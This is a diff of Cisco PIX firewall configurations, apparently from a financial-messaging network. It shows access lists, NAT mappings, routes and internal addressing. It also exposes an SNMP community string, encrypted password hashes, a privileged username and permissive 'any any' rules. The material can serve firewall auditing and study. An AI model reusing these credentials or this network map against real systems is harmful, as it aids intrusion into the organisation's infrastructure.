+ port-object eq ftp-data
+object-group network swp-srvrs
+ network-object host swp-srv1
+ network-object host swp-srv2
+ network-object host swp-nlb
+object-group service DM_INLINE_SERVICE_3
+ service-object icmp 
+ service-object tcp eq 48600 
+ service-object tcp eq https 
+object-group network DM_INLINE_NETWORK_8
+ network-object host 192.168.211.105
+ network-object host 192.168.211.106
+ network-object host enMORE-srvr4
+ network-object host enMORE-srvr3
+object-group network DM_INLINE_NETWORK_9
+ network-object host 192.168.211.105
+ network-object host 192.168.211.106
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_10
+ network-object host 192.168.211.105
+ network-object host 192.168.211.106
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_11
+ network-object host 192.168.211.105
+ network-object host 192.168.211.106
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group service DM_INLINE_TCP_11 tcp
+ port-object eq 3389
+ port-object eq www
+ port-object eq https
+object-group service mgmt-bkup-tcp tcp
+ port-object eq 445
+ port-object range 137 netbios-ssn
+ port-object eq 2967
+ port-object range 10000 10025
+ port-object range 10250 10275
+object-group service mgmt-bkup-udp udp
+ port-object eq 445
+ port-object range netbios-ns 139
+ port-object eq 2967
+ port-object eq 38293
+object-group network DM_INLINE_NETWORK_12
+ network-object host enMORE-srvr1
+ network-object host enMORE-srvr2
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_13
+ network-object host enMORE-srvr1
+ network-object host enMORE-srvr3
+object-group network DM_INLINE_NETWORK_14
+ network-object host enMORE-srvr2
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_15
+ network-object host enMORE-srvr1
+ network-object host enMORE-srvr3
+object-group network DM_INLINE_NETWORK_16
+ network-object host enMORE-srvr2
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_17
+ network-object host enMORE-srvr1
+ network-object host enMORE-srvr3
+object-group network DM_INLINE_NETWORK_18
+ network-object host enMORE-srvr2
+ network-object host enMORE-srvr4
+object-group service DM_INLINE_SERVICE_4
+ service-object tcp eq 8401 
+ service-object udp eq 8401 
+object-group network en.More_Web_Servers
+ network-object host en.MoreWebSRVR1
+object-group network DM_INLINE_NETWORK_19
+ group-object en.More-srvr
+ group-object en.More-srvr_ref
+object-group network DM_INLINE_NETWORK_20
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group service ReportingSvc tcp
+ port-object eq 1111
+object-group service DM_INLINE_SERVICE_5
+ service-object tcp eq 135 
+ service-object tcp eq 137 
+ service-object tcp eq 138 
+ service-object tcp eq 1433 
+ service-object tcp eq 1434 
+ service-object tcp eq ftp 
+ service-object udp eq 135 
+ service-object tcp range 5000 5100 
+ service-object tcp eq 3372 
+ service-object tcp eq 445 
+ service-object udp eq 139 
+ service-object udp eq 1434 
+ service-object tcp eq 3389 
+ service-object tcp eq 1111 
+object-group service DM_INLINE_SERVICE_6
+ service-object tcp eq 1111 
+ service-object tcp eq 135 
+ service-object tcp eq 137 
+ service-object tcp eq 138 
+ service-object tcp range 5000 5100 
+ service-object tcp eq https 
+ service-object tcp eq ssh 
+ service-object udp eq 135 
+ service-object tcp eq 1433 
+ service-object tcp eq 1434 
+ service-object tcp eq 3372 
+ service-object tcp eq 445 
+ service-object udp eq 139 
+ service-object udp eq 1434 
+ service-object tcp eq 3389 
+object-group network RemitONE-Srvrs
+ network-object host RemitONE-Test_Srvr1
+ network-object host RemitONE-Srvr1
+ network-object host RemitONE-Srvr2
+ network-object host RemitONE-Srvr3
+object-group network DM_INLINE_NETWORK_21
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_22
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_23
+ network-object host 192.168.206.188
+ network-object host 192.168.206.189
+object-group network DM_INLINE_NETWORK_24
+ network-object host 192.168.214.10
+ network-object host 192.168.214.11
+object-group network DM_INLINE_NETWORK_25
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_26
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group service DM_INLINE_TCP_12 tcp
+ port-object eq www
+ port-object eq https
+object-group network DM_INLINE_NETWORK_27
+ network-object host 192.168.211.105
+ network-object host 192.168.211.106
+object-group network DM_INLINE_NETWORK_28
+ network-object host 192.168.211.105
+ network-object host 192.168.211.106
+object-group service DM_INLINE_TCP_13 tcp
+ port-object eq www
+ port-object eq https
+access-list clients_access_in remark Allow en.More Level 3 MGMT Group to access en.More APP Servers
+access-list clients_access_in extended permit tcp 10.100.150.0 255.255.255.240 object-group DM_INLINE_NETWORK_27 object-group DM_INLINE_TCP_13 
+access-list clients_access_in remark Deny any traffic from en.More Level 3 MGMT Group
+access-list clients_access_in extended deny ip 10.100.150.0 255.255.255.240 object-group DM_INLINE_NETWORK_28 
+access-list clients_access_in remark Allow en.More Level 3 MGMT Group to access en.More Servers
+access-list clients_access_in extended permit tcp 10.100.150.0 255.255.255.240 object-group DM_INLINE_NETWORK_25 object-group DM_INLINE_TCP_12 
+access-list clients_access_in remark Deny any traffic from en.More Level 3 MGMT Group
+access-list clients_access_in extended deny ip 10.100.150.0 255.255.255.240 object-group DM_INLINE_NETWORK_26 
+access-list clients_access_in remark Allow HTTPS from RemitONE to en.More-srvr4
+access-list clients_access_in extended permit tcp object-group RemitONE-Srvrs object-group DM_INLINE_NETWORK_21 eq https 
+access-list clients_access_in remark Deny any traffic from RemitONE to en.More-srvr4 for Security
+access-list clients_access_in extended deny ip object-group RemitONE-Srvrs object-group DM_INLINE_NETWORK_22 
+access-list clients_access_in extended permit icmp any any 
+access-list clients_access_in extended permit tcp any object-group sag-servers-prod eq 48002 
+access-list clients_access_in extended permit tcp any object-group sag-servers-prod eq 48003 
+access-list clients_access_in extended permit tcp object-group en.More_Customers object-group en.More-srvr_ref eq www 
+access-list clients_access_in extended permit tcp object-group DM_INLINE_NETWORK_7 object-group en.More-srvr_ref object-group DM_INLINE_TCP_2 
+access-list clients_access_in extended permit tcp object-group en.More_Customers object-group ftp-srv_ref-clients object-group DM_INLINE_TCP_7 
+access-list clients_access_in extended permit tcp any object-group ftp-srv_ref-clients object-group DM_INLINE_TCP_6 
+access-list clients_access_in extended permit object-group DM_INLINE_PROTOCOL_2 object-group FEBKUS6L-ws-nw object-group sharedsaa-saa-group object-group msih-ports 
+access-list clients_access_in extended permit object-group DM_INLINE_PROTOCOL_2 object-group GPSXUS55-nw object-group sharedsaa-saa-group object-group msih-ports 
+access-list clients_access_in extended permit object-group DM_INLINE_PROTOCOL_2 object-group IDXDUS33-nw object-group sharedsaa-saa-group object-group msih-ports 
+access-list clients_access_in extended permit object-group DM_INLINE_PROTOCOL_2 object-group RBBCUS6L-ws-nw object-group sharedsaa-saa-group object-group msih-ports 
+access-list clients_access_in extended permit object-group DM_INLINE_PROTOCOL_2 object-group CAGPBMHM-nw object-group sharedsaa-saa-group object-group msih-ports 
+access-list clients_access_in extended permit object-group DM_INLINE_PROTOCOL_2 host ensb-us-nw object-group sharedsaa-saa-group object-group msih-ports 
+access-list clients_access_in extended permit tcp ensb-us-nw 255.255.255.0 object-group sharedsaa-saa-group eq 3389 
+access-list clients_access_in extended permit tcp ensb-mgmt-nw 255.255.255.0 object-group sharedsaa-saa-group eq 3389 
+access-list clients_access_in remark disconnect
+access-list clients_access_in extended permit tcp unirisx-mgmt-nw 255.255.255.0 object-group unirisx-srv-group eq 3389 inactive 
+access-list clients_access_in extended permit ip object-group FEBKUS6L-ws-nw ensb-dxb-nw 255.255.255.0 inactive 
+access-list clients_access_in remark USA DC access to DXB DC
+access-list clients_access_in extended permit ip ensb-us-nw 255.255.255.0 ensb-dxb-nw 255.255.255.0 
+access-list clients_access_in remark Unirisx Customer - disconnect
+access-list clients_access_in extended permit tcp any object-group unirisx-srv-group object-group web-ports inactive 
+access-list clients_access_in remark Unirisx Customer - disconnect
+access-list clients_access_in extended permit tcp any object-group unirisx-srv-group eq ftp inactive 
+access-list clients_access_in remark Unirisx Customer - disconnect
+access-list clients_access_in extended permit icmp any object-group unirisx-srv-group inactive 
+access-list clients_access_in remark Unirisx Keysrv - disconnect
+access-list clients_access_in extended permit tcp host UNIRISX-KEYSRV object-group unirisx-srv-group object-group Unirisx-Keysrv inactive 
+access-list clients_access_in remark ENSB mgmt
+access-list clients_access_in extended permit ip ensb-mgmt-nw 255.255.255.0 any 
+access-list clients_access_in remark disconnect
+access-list clients_access_in extended permit tcp unirisx-pharos-nw 255.255.255.0 host 192.168.211.203 eq 3389 inactive 
+access-list clients_access_in extended permit tcp finmex-mgmt-nw 255.255.255.0 host 192.168.211.100 eq 3389 
+access-list clients_access_in extended permit tcp finmex-mgmt-nw 255.255.255.0 object-group DM_INLINE_NETWORK_8 object-group DM_INLINE_TCP_8 
+access-list clients_access_in remark Access List between en.More Web Server and en.More Servers
+access-list clients_access_in extended permit object-group DM_INLINE_SERVICE_5 object-group en.More_Web_Servers object-group DM_INLINE_NETWORK_19 
+access-list clients_access_in remark Access List between en.More Web Server and en.More Servers (reporting Service) (AD-06JUN2012)
+access-list clients_access_in extended permit tcp object-group en.More_Web_Servers object-group DM_INLINE_NETWORK_20 object-group ReportingSvc 
+access-list clients_access_in remark Publish enMore Internet (requested by HM). AD.
+access-list clients_access_in extended permit tcp any object-group DM_INLINE_NETWORK_9 object-group DM_INLINE_TCP_9 
+access-list clients_access_in remark Publish enMore ftp Internet. To be enabled when needed only. AD.
+access-list clients_access_in extended permit tcp any object-group DM_INLINE_NETWORK_10 object-group DM_INLINE_TCP_10 
+access-list clients_access_in remark FOR TESTING PURPOSES ONLY. DISABLE AFTER TESTING
+access-list clients_access_in extended permit tcp any object-group DM_INLINE_NETWORK_11 object-group DM_INLINE_TCP_11 inactive 
+access-list clients_access_in extended permit icmp any host 192.168.211.100 
+access-list clients_access_in extended permit tcp any host 192.168.211.100 object-group web-ports 
+access-list clients_access_in extended permit tcp any host 192.168.211.100 eq ftp 
+access-list clients_access_in extended permit tcp object-group CAGPBMHM-nw object-group CAPG-SRV-GROUP-NAT object-group DM_INLINE_TCP_1 
+access-list clients_access_in extended permit tcp object-group CAGPBMHM-NW-DR object-group CAPG-SRV-GROUP-NAT object-group DM_INLINE_TCP_3 
+access-list clients_access_in extended permit ip ensb-jo-nw 255.255.255.0 ensb-dxb-nw 255.255.255.0 
+access-list clients_access_in extended permit ip nw-sslvpn-nw 255.255.255.0 ensb-dxb-nw 255.255.255.0 
+access-list clients_access_in remark disabled April 1, 2013
+access-list clients_access_in extended permit tcp any any eq 30003 inactive 
+access-list clients_access_in remark disabled April 1, 2013
+access-list clients_access_in extended permit udp any any eq 30003 inactive 
+access-list clients_access_in extended permit udp any object-group en.More-srvr_ref eq nameserver 
+access-list clients_access_in extended permit object-group DM_INLINE_SERVICE_3 host 172.28.0.0 object-group swp-srvrs 
+access-list clients_access_in extended permit tcp cs-support-nw 255.255.255.0 host enMORE-srvr1 eq www 
+access-list clients_access_in extended permit tcp cs-support-nw 255.255.255.0 host enMORE-srvr1 eq https 
+access-list clients_access_in extended permit ip host en.MoreWebSRVR1 ensb-dxb-mgmt-nw 255.255.255.0 
+access-list clients_access_in extended permit icmp host en.MoreWebSRVR1 ensb-dxb-mgmt-nw 255.255.255.0 
+access-list sag_access_in extended permit icmp any object-group en.More-srvr 
+access-list sag_access_in extended permit ip any object-group en.More-srvr 
+access-list sag_access_in extended permit icmp any any 
+access-list sag_access_in extended permit tcp any any eq 3389 
+access-list sag_access_in extended permit ip any any 
+access-list swift_access_in extended permit ip any any 
+access-list Hosting extended permit object-group DM_INLINE_PROTOCOL_2 object-group CAGP-SRV-GROUP object-group CAGPBMHM-nw object-group msih-ports inactive 
+access-list Hosting extended permit icmp 192.168.209.0 255.255.255.0 ensb-us-nw 255.255.255.0 
+access-list Hosting extended permit tcp 192.168.209.0 255.255.255.0 ensb-us-nw 255.255.255.0 eq 3389 
+access-list Hosting extended permit icmp 192.168.209.0 255.255.255.0 any 
+access-list Hosting extended permit tcp 192.168.209.0 255.255.255.0 object-group sag-servers-prod eq 48002 
+access-list Hosting extended permit tcp 192.168.209.0 255.255.255.0 object-group sag-servers-prod eq 48003 
+access-list Hosting extended permit object-group TCPUDP object-group sharedsaa-saa-group object-group FEBKUS6L-ws-nw object-group msih-ports 
+access-list Hosting extended permit object-group DM_INLINE_PROTOCOL_2 object-group sharedsaa-saa-group object-group IDXDUS33-nw object-group msih-ports 
+access-list Hosting extended permit object-group DM_INLINE_PROTOCOL_2 object-group sharedsaa-saa-group object-group RBBCUS6L-ws-nw object-group msih-ports 
+access-list Hosting extended permit object-group DM_INLINE_PROTOCOL_2 object-group sharedsaa-saa-group object-group GPSXUS55-nw object-group msih-ports 
+access-list Hosting extended permit object-group DM_INLINE_PROTOCOL_2 object-group sharedsaa-saa-group object-group CAGPBMHM-nw object-group msih-ports 
+access-list Hosting extended permit tcp 192.168.209.0 255.255.255.0 any object-group FMSIH-PRINT-TCP 
+access-list Hosting extended permit ip 192.168.209.0 255.255.255.0 any log 
+access-list Hosting extended permit ip ensb-dxb-nw 255.255.255.0 ensb-jo-nw 255.255.255.0 
+access-list Hosting remark test only
+access-list Hosting extended permit ip any any inactive 
+access-list Hosting extended permit ip host 192.168.211.31 any inactive 
+access-list Hosting extended permit icmp host 192.168.211.31 any inactive 
+access-list Hosting extended permit ip 192.168.209.0 255.255.255.0 192.168.200.0 255.255.255.0 
+access-list Hosting extended permit icmp 192.168.209.0 255.255.255.0 192.168.200.0 255.255.255.0 
+access-list Hosting extended permit icmp any any 
+access-list unirisx_access_in remark keyserver.hostidp.com on TCP port 18021
+access-list unirisx_access_in extended permit tcp host unirisx-srv1 host UNIRISX-KEYSRV object-group Unirisx-Keysrv 
+access-list unirisx_access_in remark DNS for host. AD
+access-list unirisx_access_in extended permit udp host unirisx-srv1 any eq domain 
+access-list unirisx_access_in extended permit ip 192.168.213.0 255.255.255.0 any 
+access-list unirisx_access_in extended permit icmp 192.168.213.0 255.255.255.0 any 
+access-list mgmt_access_in extended permit icmp ensb-dxb-mgmt-nw 255.255.255.0 object-group DM_INLINE_NETWORK_2 
+access-list mgmt_access_in extended permit ip ensb-dxb-mgmt-nw 255.255.255.0 object-group DM_INLINE_NETWORK_1 
+access-list mgmt_access_in extended permit icmp ensb-dxb-mgmt-nw 255.255.255.0 object-group DM_INLINE_NETWORK_3 
+access-list mgmt_access_in extended permit ip ensb-dxb-mgmt-nw 255.255.255.0 object-group DM_INLINE_NETWORK_4 
+access-list mgmt_access_in extended permit icmp any any 
+access-list mgmt_access_in extended permit ip ensb-dxb-mgmt-nw 255.255.255.0 object-group DM_INLINE_NETWORK_13 
+access-list mgmt_access_in extended permit ip ensb-dxb-mgmt-nw 255.255.255.0 object-group DM_INLINE_NETWORK_14 
+access-list mgmt_access_in extended permit tcp host enMORE-srvr1 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-tcp 
+access-list mgmt_access_in extended permit tcp host enMORE-srvr2 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-tcp 
+access-list mgmt_access_in extended permit udp host enMORE-srvr1 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-udp 
+access-list mgmt_access_in extended permit udp host enMORE-srvr2 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-udp 
+access-list mgmt_access_in extended permit ip host enMORE-srvr1 ensb-dxb-mgmt-nw 255.255.255.0 
+access-list mgmt_access_in extended permit ip host enMORE-srvr3 ensb-dxb-mgmt-nw 255.255.255.0 
+access-list mgmt_access_in extended permit ip host enMORE-srvr4 ensb-dxb-mgmt-nw 255.255.255.0 
+access-list mgmt_access_in extended permit ip ensb-dxb-mgmt-nw 255.255.255.0 host en.MoreWebSRVR1 
+access-list mgmt_access_in extended permit icmp ensb-dxb-mgmt-nw 255.255.255.0 host en.MoreWebSRVR1 
+access-list finmex_access_in remark Tempo Access List to update windows
+access-list finmex_access_in extended permit tcp host enMORE-srvr4 object-group RemitONE-Srvrs eq https 
+access-list finmex_access_in extended permit ip host finmex-srv1 finmex-mgmt-nw 255.255.255.0 
+access-list finmex_access_in extended permit tcp host finmex-srv1 any object-group web-ports 
+access-list finmex_access_in extended permit tcp host finmex-srv1 any eq ftp 
+access-list finmex_access_in extended permit object-group DM_INLINE_PROTOCOL_2 host finmex-srv1 any eq domain 
+access-list finmex_access_in extended permit icmp host finmex-srv1 any 
+access-list finmex_access_in extended permit object-group DM_INLINE_SERVICE_1 host finmex-srv1 object-group DM_INLINE_NETWORK_5 
+access-list finmex_access_in remark Access List between en.More Servers and en.More Web Server
+access-list finmex_access_in extended permit ip object-group en.More-srvr object-group en.More_Web_Servers inactive 
+access-list finmex_access_in remark Access List between en.More Servers and en.More Web Server
+access-list finmex_access_in extended permit object-group DM_INLINE_SERVICE_6 object-group en.More-srvr object-group en.More_Web_Servers 
+access-list finmex_access_in extended permit icmp object-group en.More-srvr host 192.168.214.245 
+access-list finmex_access_in extended permit tcp host enMORE-srvr1 host SL1 eq ftp inactive 
+access-list finmex_access_in extended permit object-group DM_INLINE_SERVICE_4 object-group en.More-srvr object-group DM_INLINE_NETWORK_23 
+access-list finmex_access_in extended permit icmp object-group en.More-srvr any 
+access-list finmex_access_in extended permit icmp host enMORE-srvr2 any inactive 
+access-list finmex_access_in extended permit ip object-group en.More-srvr ensb-dxb-mgmt-nw 255.255.255.0 inactive 
+access-list finmex_access_in extended permit tcp object-group en.More-srvr object-group DM_INLINE_NETWORK_6 object-group DM_INLINE_TCP_4 
+access-list finmex_access_in remark Internet Access - For Licensing Only. To be disabled after use. AD
+access-list finmex_access_in extended permit object-group DM_INLINE_SERVICE_2 object-group en.More-srvr any inactive 
+access-list finmex_access_in remark Internet Access - For Licensing Only. To be disabled after use. AD
+access-list finmex_access_in extended permit object-group DM_INLINE_PROTOCOL_2 object-group en.More-srvr any eq domain inactive 
+access-list finmex_access_in extended permit tcp object-group en.More-srvr object-group ftp-srv_ref-finmex object-group DM_INLINE_TCP_5 
+access-list finmex_access_in remark Internet Access - For Licensing Only. To be disabled after use. AD
+access-list finmex_access_in extended permit tcp object-group en.More-srvr any eq ftp inactive 
+access-list finmex_access_in extended permit ip object-group en.More-srvr object-group ftp-srv_ref-finmex 
+access-list finmex_access_in extended permit tcp object-group DM_INLINE_NETWORK_15 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-tcp 
+access-list finmex_access_in extended permit tcp object-group DM_INLINE_NETWORK_16 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-tcp 
+access-list finmex_access_in extended permit udp object-group DM_INLINE_NETWORK_17 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-udp 
+access-list finmex_access_in extended permit udp object-group DM_INLINE_NETWORK_18 ensb-dxb-mgmt-nw 255.255.255.0 object-group mgmt-bkup-udp 
+access-list finmex_access_in extended permit ip host enMORE-srvr1 ensb-dxb-mgmt-nw 255.255.255.0 
+access-list finmex_access_in extended permit ip object-group DM_INLINE_NETWORK_12 object-group DM_INLINE_NETWORK_24 
+pager lines 20
+logging enable
+logging asdm errors
+mtu clients 1500
+mtu host 1500
+mtu sag 1500
+mtu unirisx 1500
+mtu mgmt 1500
+mtu finmex 1500
+failover
+failover lan unit primary
+icmp unreachable rate-limit 1 burst-size 1
+icmp permit any finmex
+asdm image flash:/asdm-602.bin
+asdm location sag-srv2 255.255.255.255 sag
+asdm location sagfin1 255.255.255.255 sag
+asdm location vpn1-int 255.255.255.255 clients
+asdm location vpn2-int 255.255.255.255 clients
+asdm location vpn1-2-nsrp 255.255.255.255 clients
+asdm location sagsns1 255.255.255.255 sag
+asdm group sag-servers-prod sag
+asdm group ensb-vpns-group clients
+asdm group sag-srv-test sag
+asdm group sag-servers-prod_ref clients reference sag-servers-prod
+asdm group ensb-dxb-nw clients
+no asdm history enable
+arp timeout 14400
+static (host,clients) host-srv1 ensbusl1 netmask 255.255.255.255 
+static (host,clients) host-srv2 ensbusl2 netmask 255.255.255.255 
+static (host,clients) host-srv3 ensbusl3 netmask 255.255.255.255 
+static (unirisx,clients) 192.168.211.201 unirisx-srv1 netmask 255.255.255.255 
+static (unirisx,clients) 192.168.211.202 unirisx-srv2 netmask 255.255.255.255 
+static (unirisx,clients) 192.168.211.203 unirisx-srv3 netmask 255.255.255.255 
+static (host,sag) 192.168.202.50 host-srv1 netmask 255.255.255.255 
+static (host,sag) 192.168.202.51 host-srv2 netmask 255.255.255.255 
+static (host,sag) 192.168.202.52 host-srv3 netmask 255.255.255.255 
+static (sag,finmex) 192.168.214.25 sagfin2 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.22 sagsns1 netmask 255.255.255.255 
+static (finmex,clients) 192.168.211.100 finmex-srv1 netmask 255.255.255.255 
+static (finmex,sag) finmex-srv1 finmex-srv1 netmask 255.255.255.255 
+static (mgmt,finmex) 192.168.214.10 192.168.208.10 netmask 255.255.255.255 
+static (mgmt,finmex) 192.168.214.11 192.168.208.11 netmask 255.255.255.255 
+static (finmex,clients) 192.168.211.105 enMORE-srvr1 netmask 255.255.255.255 
+static (host,finmex) SL1 host-srv2 netmask 255.255.255.255 
+static (finmex,clients) 192.168.211.106 enMORE-srvr2 netmask 255.255.255.255 
+static (sag,host) 192.168.209.25 sagfin1 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.25 sag-srv2 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.208 192.168.200.208 netmask 255.255.255.255 
+static (sag,host) 192.168.209.208 192.168.200.208 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.21 sagtest1 netmask 255.255.255.255 
+static (sag,finmex) 192.168.214.21 sagtest1 netmask 255.255.255.255 
+static (sag,host) 192.168.209.21 sagtest1 netmask 255.255.255.255 
+static (sag,host) 192.168.209.22 sagsns1 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.115 enFTP1 netmask 255.255.255.255 
+static (sag,finmex) 192.168.214.245 enFTP1 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.111 192.168.202.11 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.28 swp-srv1 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.29 swp-srv2 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.30 swp-nlb netmask 255.255.255.255 
+static (host,clients) 192.168.211.31 CAGP-SRV2 netmask 255.255.255.255 
+static (host,clients) 192.168.211.32 CAGP-SRV1 netmask 255.255.255.255 
+static (finmex,clients) enMORE-srvr3 enMORE-srvr3 netmask 255.255.255.255 
+static (finmex,clients) enMORE-srvr4 enMORE-srvr4 netmask 255.255.255.255 
+static (sag,clients) 192.168.211.101 ensbdrsa2 netmask 255.255.255.255 
+access-group clients_access_in in interface clients
+access-group Hosting in interface host
+access-group sag_access_in in interface sag
+access-group unirisx_access_in in interface unirisx
+access-group mgmt_access_in in interface mgmt
+access-group finmex_access_in in interface finmex
+route clients 0.0.0.0 0.0.0.0 vpn1-2-nsrp 1
+route sag 10.149.11.0 255.255.255.0 192.168.202.1 1
+route clients ensb-us-nw 255.255.255.0 vpn1-2-nsrp 1
+route sag 192.168.200.0 255.255.255.0 192.168.202.1 2
+route sag ensb-dxb-mgmt-nw 255.255.255.0 192.168.202.1 5
+route sag 192.168.216.22 255.255.255.255 192.168.202.1 2
+route sag 192.168.216.25 255.255.255.255 192.168.202.1 2
+route sag 192.168.216.33 255.255.255.255 192.168.202.1 2
+route sag 192.168.218.0 255.255.255.0 192.168.202.1 2
+route clients BICs-HomeSend-Prod 255.255.255.255 vpn1-2-nsrp 1
+route clients BICs-HomeSend-Test 255.255.255.255 vpn1-2-nsrp 1
+timeout xlate 3:00:00
+timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02
+timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 mgcp-pat 0:05:00
+timeout sip 0:30:00 sip_media 0:02:00 sip-invite 0:03:00 sip-disconnect 0:02:00
+timeout uauth 0:05:00 absolute
+dynamic-access-policy-record DfltAccessPolicy
+http server enable
+http 192.168.209.0 255.255.255.0 host
+http 192.168.202.0 255.255.255.0 sag
+http ensb-dxb-mgmt-nw 255.255.255.0 mgmt
+snmp-server host mgmt 192.168.208.11 community ^enSBSXstr1ng^
+no snmp-server location
+no snmp-server contact
+snmp-server enable traps snmp authentication linkup linkdown coldstart
+no crypto isakmp nat-traversal
+telnet 192.168.209.0 255.255.255.0 host
+telnet 192.168.202.0 255.255.255.0 sag
+telnet ensb-dxb-mgmt-nw 255.255.255.0 mgmt
+telnet timeout 5
+ssh 192.168.208.11 255.255.255.255 mgmt
+ssh timeout 5
+console timeout 0
+threat-detection basic-threat
+threat-detection statistics access-list
+!
+class-map inspection_default
+ match default-inspection-traffic
+!
+!
+policy-map type inspect dns preset_dns_map
+ parameters
+  message-length maximum 512
+policy-map global_policy
+ class inspection_default
+  inspect dns preset_dns_map 
+  inspect ftp 
+  inspect h323 h225 
+  inspect h323 ras 
+  inspect netbios 
+  inspect rsh 
+  inspect rtsp 
+  inspect skinny  
+  inspect esmtp 
+  inspect sqlnet 
+  inspect sunrpc 
+  inspect tftp 
+  inspect sip  
+  inspect xdmcp 
+!
+service-policy global_policy global
+tftp-server mgmt 192.168.208.10 /
+username kbaluyot password veUjjfuhoN5j6Rty encrypted privilege 15
+prompt hostname context 
+Cryptochecksum:8ddccd69852ef5593991d48ba55c81e9
+: end

swift/00727_0_ensbdpix5-31aug2013

@@ -0,0 +1,334 @@
+: Saved
+: Written by adesear at 22:26:38.612 UTC Sat Aug 31 2013
+!
+PIX Version 8.0(2) 
+!
+hostname ENSBUSPIX2
+enable password Ro5XpDeSuehPBEdi encrypted
+names
+name 192.168.208.10 mgmt-srv1
+name 192.168.208.11 mgmt-srv2
+name 192.168.221.237 ensbdswapp-clus
+name 192.168.221.238 ensbdswapp1
+name 192.168.221.239 ensbdswapp2
+name 192.168.221.240 ensbdswdb-clus
+name 192.168.221.241 ensbdswdb1
+name 192.168.221.242 ensbdswdb2
+name 10.100.200.0 ensb-mgmt-nw
+name 10.149.10.0 nw-sslvpn-nw
+name 202.40.237.146 telepin-app-srv1
+name 202.40.237.153 telepin-ftp-srv1
+name 10.159.9.146 singprod-user1
+name 10.159.9.155 singprod-user10
+name 10.159.9.147 singprod-user2
+name 10.159.9.148 singprod-user3
+name 10.159.9.149 singprod-user4
+name 10.159.9.150 singprod-user5
+name 10.159.9.151 singprod-user6
+name 10.159.9.152 singprod-user7
+name 10.159.9.153 singprod-user8
+name 10.159.9.154 singprod-user9
+!
+interface Ethernet0
+ nameif clients
+ security-level 10
+ ip address 192.168.211.5 255.255.255.0 
+!
+interface Ethernet1
+ nameif swaas
+ security-level 50
+ ip address 192.168.221.5 255.255.255.0 
+!
+interface Ethernet2
+ shutdown
+ nameif finmex
+ security-level 50
+ ip address 192.168.214.5 255.255.255.0 
+!
+interface Ethernet3
+ shutdown
+ no nameif
+ no security-level
+ no ip address
+!
+interface Ethernet4
+ description mgmt zone
+ nameif mgmt
+ security-level 90
+ ip address 192.168.208.5 255.255.255.0 
+!
+interface Ethernet5
+ no nameif
+ no security-level
+ no ip address
+!
+interface Ethernet5.1
+ shutdown
+ no vlan
+ no nameif
+ no security-level
+ no ip address
+!
+interface Ethernet5.2
+ shutdown
+ no vlan
+ no nameif
+ no security-level
+ no ip address
+!
+interface Ethernet5.3
+ shutdown
+ no vlan
+ no nameif
+ no security-level
+ no ip address
+!
+passwd Ro5XpDeSuehPBEdi encrypted
+ftp mode passive
+object-group network mgmt-srv-group
+ network-object host mgmt-srv1
+ network-object host mgmt-srv2
+object-group network safe-srv-group
+ network-object host ensbdswapp-clus
+ network-object host ensbdswapp1
+ network-object host ensbdswapp2
+ network-object host ensbdswdb-clus
+ network-object host ensbdswdb1
+ network-object host ensbdswdb2
+object-group network safeapp-srv-group
+ network-object host ensbdswapp-clus
+ network-object host ensbdswapp1
+ network-object host ensbdswapp2
+object-group network safeapp-srv-group-ref_clients
+ network-object host 192.168.211.237
+ network-object host 192.168.211.238
+ network-object host 192.168.211.239
+object-group network safedb-srv-group
+ network-object host ensbdswdb-clus
+ network-object host ensbdswdb1
+ network-object host ensbdswdb2
+object-group network safe-srv-group-ref_clients
+ network-object host 192.168.211.237
+ network-object host 192.168.211.238
+ network-object host 192.168.211.239
+ network-object host 192.168.211.240
+ network-object host 192.168.211.241
+ network-object host 192.168.211.242
+object-group network finmex-mgmt-grp
+ network-object host 10.100.215.11
+ network-object host 10.100.215.12
+ network-object host 10.100.215.13
+ network-object host 10.100.215.14
+ network-object host 10.100.215.15
+object-group service rdp
+ service-object tcp eq 3389 
+object-group network sw-support-grp
+ network-object host 10.100.225.11
+ network-object host 10.100.225.12
+ network-object host 10.100.225.13
+ network-object host 10.100.225.14
+ network-object host 10.100.225.15
+ network-object host 10.100.225.16
+ network-object host 10.100.225.18
+ network-object host 10.100.225.19
+ network-object host 10.100.225.20
+object-group service safewatch-tcp tcp
+ port-object eq 1443
+ port-object eq 8080
+ port-object eq 8401
+ port-object eq https
+ port-object eq 8330
+ port-object eq 8336
+object-group service safewatch-udp udp
+ port-object eq 8400
+object-group service DM_INLINE_TCP_1 tcp
+ port-object eq ftp
+ port-object eq ssh
+object-group network singprod-users-grp
+ network-object host 10.159.9.136
+ network-object host 10.159.9.137
+ network-object host 10.159.9.138
+ network-object host 10.159.9.139
+ network-object host 10.159.9.140
+ network-object host 10.159.9.141
